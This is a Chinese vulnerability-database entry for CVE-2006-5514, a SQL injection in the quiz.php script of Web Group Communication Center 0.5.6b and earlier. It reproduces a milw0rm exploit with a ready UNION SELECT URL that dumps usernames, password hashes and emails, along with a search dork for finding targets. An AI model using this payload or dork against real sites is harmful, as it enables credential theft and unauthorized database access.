Web Group Communication Center 'Quiz.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111343 漏洞类型 SQL注入
发布时间 2006-10-20 更新时间 2006-10-30
CVE编号 CVE-2006-5514 CNNVD-ID CNNVD-200610-455
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2604
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-455
|漏洞详情
WebGroupCommunicationCenter(WGCC)0.5.6b及更早版本的quiz.php中存在SQL注入漏洞,远程攻击者可通过qzid参数执行任意SQL指令。
|漏洞EXP
# Title  :   WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability
# Author :   ajann
# Dork   :   "Web Group Communication Center beta 0.5.6/0.5.5/.."
# Greetz :   Tüm, Müslüman, Aleminin, Ramazan, Bayram., MUBAREK, Olsun

-->Login Before Injection

[Inject]]]

### http://[target.com]/[path]/quiz.php?action=show&qzid=[]SQL INJECTION[]

Example:
quiz.php?action=show&qzid=-1%20union%20select%200,0,0,0,username,passwort,email,0,0,0,0,0,0,0,0%20from%20wgcc_user%20where%20userid=1

++ userid=1 Change This

Crack MD5 HASH

[/Inject]]]

#ajann,Turkey
#...

#Im Not Hacker!

# milw0rm.com [2006-10-20]
|参考资料

来源:XF
名称:wgcc-quiz-sql-injection(29712)
链接:http://xforce.iss.net/xforce/xfdb/29712
来源:BID
名称:20653
链接:http://www.securityfocus.com/bid/20653
来源:MILW0RM
名称:2604
链接:http://www.milw0rm.com/exploits/2604
来源:MILW0RM
名称:2604
链接:http://milw0rm.com/exploits/2604